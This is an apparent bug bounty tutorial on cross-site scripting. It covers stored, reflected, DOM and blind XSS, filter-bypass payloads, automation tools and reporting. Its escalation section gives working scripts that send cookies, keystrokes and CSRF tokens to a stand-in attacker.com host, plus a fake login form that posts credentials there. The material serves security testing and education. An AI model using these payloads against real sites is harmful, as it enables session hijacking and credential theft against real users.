Bug Bounty Hunting: Web Vulnerabilities

XSS is a web security vulnerability that allows an attacker to execute arbitrary scripts in a victim’s browser by injecting malicious code into a vulnerable web application.

Impact of XSS

Session Hijacking: Stealing cookies for authentication bypassUser Redirection: Redirecting victims to malicious sitesData Theft: Extracting CSRF tokens, credentials, or other sensitive dataKeylogging: Capturing keystrokes for credential theftDefacement: Modifying content on the victim’s screen

Types of XSS

Stored XSS (Persistent XSS): The payload is stored permanently in a database or logs. It affects all users who view the infected page.Example: Injecting XSS in a comment section:<script>alert('Stored XSS');</script>Exploitation Tip: Target user-generated content like forums, profiles, or message boards.

2. Reflected XSS: The payload is immediately reflected in the response. It requires social engineering (the victim must click a link).

Example:https://example.com/search?q=<script>alert('Reflected XSS');</script>Exploitation Tip: Try injecting payloads into search bars, error messages, or input fields.

3. DOM-Based XSS: The payload is executed client-side via JavaScript manipulation.

Example: var userInput = location.hash.substr(1); document.write("<h1>" + userInput + "</h1>");Visiting https://example.com/#<script>alert('DOM XSS')</script> executes the script.Exploitation Tip: Look for innerHTML, document.write(), eval(), setTimeout() handling user input.

4. Blind XSS: A type of Stored XSS where the payload executes in an unseen part of the application, such as an admin panel or internal logs.

Example: Submitting a payload in a support ticket form that later executes for an admin.<script src="http://attacker.com/blind.js"></script>Exploitation Tip: Use tools like XSS Hunter to automate detection.

XSS: Finding Input Points

User input fields: Comment sections, search bars, contact forms, etc.Try injecting a unique test string (XSS_TEST_STRING_123) and check if it appears in the response.Modify HTTP requests using Burp Suite to bypass client-side filters.

Inserting XSS Payloads

Basic PoC: <script>alert('XSS Found');</script>Injecting into an image tag (Bypassing filters): <img src=x onerror=alert('XSS')>Using javascript: scheme in URLs: javascript:alert('XSS')Base64-encoded XSS for bypassing filters: data:text/html,<script>alert('XSS')</script>

XSS Exploitation Techniques

If <script> tags are blocked, inject JavaScript into HTML attributes: <img src=x onerror=alert('XSS')><a href="#" onclick="alert('XSS')">Click Me</a>

2. Some applications reflect headers like Referer or User-Agent: User-Agent: <script>alert('XSS')</script> Try injecting payloads in HTTP request headers and check reflected responses.

3. Injecting JavaScript in Form Actions: <form action="javascript:alert('XSS')"> <input type="submit" value="Submit"> </form>

4. JavaScript Execution via CSS Attributes: <style> @import "javascript:alert('XSS')"; </style>

Bypassing XSS Filters

Bypass string filtering by using variations of the script tag:<ScRiPt>alert('XSS')</sCrIpT>Use String.fromCharCode() to avoid using quotes <script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>If your input is inside an attribute, break out of it:
"><script>alert('XSS')</script>JavaScript inside <svg> tags: <svg onload=alert('XSS')>Exploiting template injection: <template><script>alert('XSS')</script></template>Injecting script via data URIs: data:text/html,<script>alert('XSS')</script>

Escalating XSS Attacks

Stealing Cookies (Session Hijacking): Use HttpOnly cookies to prevent JavaScript access.<script>
document.location = 'http://attacker.com/cookie?c=' + document.cookie;
</script>

2. Keylogging User Input: Log keystrokes from login forms.

<script>
document.onkeypress = function(e) {
fetch('http://attacker.com/log?key=' + e.key);
};
</script>

3. Extracting CSRF Tokens: Attackers can perform unauthorized actions on behalf of victims.

var token = document.getElementById('csrf-token').value;
fetch('http://attacker.com/?token='+token);

4. Phishing via Fake Login Page: Tricking users into entering credentials on a fake page.

document.body.innerHTML = '<form action="http://attacker.com"><input type="text" name="user"><input type="password" name="pass"><input type="submit"></form>';

Automating XSS Hunting

XSS Hunter helps find Blind XSS by sending payloads to internal panels.Automate XSS payload fuzzing using Burp Intruder.Use one-size-fits-all payloads for various injection contexts:javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>Exploitation Tip: Test across multiple browsers for compatibility.

Reporting an XSS Vulnerability

Describe the Vulnerability: Type (Stored, Reflected, DOM, Blind)Proof-of-Concept (PoC): Provide a working payload.Impact Analysis: Explain how it affects users or admins.Possible Fixes: Suggest sanitization, CSP, or HttpOnly cookies.